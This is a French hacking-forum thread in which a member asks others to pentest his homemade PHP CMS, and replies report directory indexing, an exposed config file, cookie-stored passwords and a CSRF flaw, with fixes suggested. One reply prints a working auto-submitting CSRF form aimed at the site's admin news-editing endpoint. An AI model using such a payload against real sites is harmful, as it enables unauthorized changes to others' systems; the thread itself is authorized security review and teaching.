• STATISTIQUES
  • Il y a eu un total de 0 membres et 27974 visiteurs sur le site dans les dernières 24h pour un total de 27 974 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Comment ca marche
     Gratuit et accessible à tous, ce site de communauté permet de se dépanner, se faire aider ...
    Webmaster
    [FR] apprendre-a-manipuler
    Site d'apprentissage de la manipulation d'autrui.
    Hacking
    [EN] wechall
    Pour les gens n'étant pas familiers avec les sites de challenges, un site de challenges est un site propos...
    Hacking
    [EN] Reddit
    Subreddit dédié à la sécurité informatique.
    Hacking
    [EN] Net Force
    Javascript: 9, Java Applets: 6, Cryptography: 16, Exploits: 7, Cracking: 14, Programming: 13, Internet: 15, Steganograph...
    Challenges
    [EN] Big-Daddy
    Big-Daddy est site internet communautaire avec un effectif diversifié, y compris des artistes, des programmeur...
    Hacking
    [FR] frameip
    le site de partage des connaissances du monde TCPIP
    Protocole

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
MyCMS
27-09-2012, 22h39 (Modification du message : 29-09-2012, 21h25 par Swissky.)
Message : #1
Swissky Absent
Bon membre
*



Messages : 523
Sujets : 32
Points: 96
Inscription : Apr 2012
MyCMS
Bonjour tous le monde,
Sa faisait un moment que je voulais me remettre au PHP surtout pour manipuler les base de données donc j'ai fait un petit CMS.

Lien du Site à pentest :Supprimé, site HS , bande passante saturée, hebergement de m*rde ^^'

Pour les autorisations : tout est dans la première news.
Le site n'ayant aucune valeur particulière vous pouvez mettre les failles en évidences en postant une News (enfin pour faire sa faudrait d'abord en trouver Tongue)

Le CMS sera OpenSource et je mettrais des remerciements pour les personnes ayant trouvés des failles.
Merci d'avance Smile
+1 (0) -1 (0) Répondre
27-09-2012, 23h12 (Modification du message : 28-09-2012, 04h39 par CyberSee.)
Message : #2
CyberSee Hors ligne
Admin fondateur de N-PN
*******



Messages : 1,721
Sujets : 287
Points: 157
Inscription : Jan 2012
RE: MyCMS
A première vue, ton formulaire de login a l'aire bien protèger de la faille SQL. On ne peut pas tester grand chose par le manque de possibiliter de manipulation. Le site est donc naturelement protèger par ça simplicité. Par contre, j'ai remarqué que l'indexage des dossiers n'est pas bloqué. Sur la page admin (overwr1t3.byethost31.com/admin/index.php) en regardant la source, j'ai remarqué l'utilisation du dossier plugins pour des fichiers .js. Sachant que ce dossier est féquament utilisé pour stocker des fichiers a saveur croustillante, j'ai taper l'adresse directement dans mon furteur

http://overwr1t3.byethost31.com/plugins/

Et surprise je suis tomber sur le répertoir complet

Index of /plugins

Name Last modified Size Description
Parent Directory -
markitup/ 27-Sep-2012 16:17 -
plugin_apropos.php 27-Sep-2012 16:17 903
plugin_bbcode.php 27-Sep-2012 16:17 698
plugin_liens.php 27-Sep-2012 16:17 756
plugin_social.php 27-Sep-2012 16:17 1.1K

J'ai obtenue une erreur de connexion sur la pluspart des fichiers sauf plugin_bbcode.php. Ne sachant pas ce qu'elle contient, il est impossible de savoir si le fichier est manipulable en envoyant des résultats de formulaire ou en traficant l'url. Par contre, ton CMS devrait venir avec un htaccess qui par défaut empêche l'indexation des répertoires. Certain CMS utilise des index.php vide dans chaque dossier.

(code pour .htaccess)
Code :
Options -Indexes

Si tu veux que nous trouvions plus de faille potentiel, donne nous un accès admin et met ta sources quelque part ou nous pourrons la télécharger pour comprendre le code et faire les déductions de manipulations nesessaire pour arriver a des conclusions de faille.

J'ai aussie remarquer que le fichier http://overwr1t3.byethost31.com/admin/config.php
Retourne une page blanche ce qui confirme son existance. Il est préférable en PHP de bloquer l'accès direct au fichier qui ne devrais pas être ouverte. Tu peux faire sa en initialisant une variable dans ton index et ensuite vérifier si elle existe dans le haut de tes pages et si non faire un die("Cette page ne peut pas être directement ouverte");
+1 (0) -1 (0) Répondre
28-09-2012, 17h46 (Modification du message : 28-09-2012, 17h47 par kallimero.)
Message : #3
kallimero Hors ligne
Imbécile heureux
*



Messages : 37
Sujets : 2
Points: 4
Inscription : Aug 2011
RE: MyCMS
L'interface admin semble être atteinte d'une csrf (désolé d'avoir casser l'article en le testant), couplé a la possibilité d'injecter du html dans les news, et au stockage du mot de pass dans les cookies, il est très facile de pwn ton cms.

Utilise un système de token anti-csrf, et un autre système d'auth (par session par exemple).

Pour la csrf, j'ai utilisé ceci :
Code :
<body onload="document.forms[0].submit();">
<form method="post" action="http://overwr1t3.byethost31.com/admin/_modnews.php">
    <input type="hidden" name="titleBox" value="Pentest" >
    <input type="hidden" name="oldtitleBox" value="Pentest">
    <input type="hidden" name="newsBox" value="csrf test">
</form>
</body>


Pour modifier l'article pentest.
Avec un peu d'huile de coude, du js avec des timers et iframe, on peux imaginer un exploit en un lien.
+1 (1) -1 (0) Répondre
28-09-2012, 18h45
Message : #4
kallimero Hors ligne
Imbécile heureux
*



Messages : 37
Sujets : 2
Points: 4
Inscription : Aug 2011
RE: MyCMS
Avec le code on pourrait plus facilement aidé.
+1 (0) -1 (0) Répondre
28-09-2012, 22h24
Message : #5
Swissky Absent
Bon membre
*



Messages : 523
Sujets : 32
Points: 96
Inscription : Apr 2012
RE: MyCMS
Code Source pret pour une utilisation en local avec Wamp.
Enjoy Wink
+1 (0) -1 (0) Répondre
28-09-2012, 22h42 (Modification du message : 28-09-2012, 22h43 par EpicOut.)
Message : #6
EpicOut Hors ligne
Banni



Messages : 121
Sujets : 10
Points: 22
Inscription : Feb 2012
RE: MyCMS
T'as fait un peu à la bourrin ton code, tu mélanges du pdo et du mysql_; mais sinon il est bien indenté (à première vue) je finirais de le regarder ce soir et j'essayerais de l'améliorer.
+1 (0) -1 (0) Répondre
28-09-2012, 22h51
Message : #7
Swissky Absent
Bon membre
*



Messages : 523
Sujets : 32
Points: 96
Inscription : Apr 2012
RE: MyCMS
En fait j'avais commencé en PDO mais sa m'a vite soulé donc j'ai utilisé mysql pour le reste, mais j'ai effectivement laissé PDO dans l'index, d'ailleurs y 'en a t'il un qui soit meilleur que l'autre ?
+1 (0) -1 (0) Répondre
28-09-2012, 22h52
Message : #8
EpicOut Hors ligne
Banni



Messages : 121
Sujets : 10
Points: 22
Inscription : Feb 2012
RE: MyCMS
Bah mysql n'est plus mis à jour et va devenir obsolète donc je te conseille fortement d'utiliser pdo.
+1 (0) -1 (0) Répondre


Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut